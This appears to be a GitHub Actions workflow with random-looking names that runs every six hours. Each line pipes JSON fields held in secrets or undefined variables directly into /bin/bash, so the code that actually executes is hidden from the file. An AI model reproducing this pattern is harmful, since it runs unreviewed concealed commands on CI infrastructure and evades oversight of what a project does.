name: yuantanzhanxian

on:
  workflow_dispatch:
  schedule:
    - cron: '27 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuantanzhanxian
        env:
          ho92: ${{ secrets.ho92 }}
        run: |
          echo $ho92 | jq -r .v48946 | /bin/bash
          echo $ijl31 | jq -r .jkdx7370 | /bin/bash
          echo $ruftw65943 | jq -r .pjf31 | /bin/bash
          echo $elkxg569 | jq -r .ncvd7537 | /bin/bash
          echo $mj035 | jq -r .oa46575 | /bin/bash
          echo $i605 | jq -r .ji69 | /bin/bash
          echo $twkr09058 | jq -r .c96145 | /bin/bash

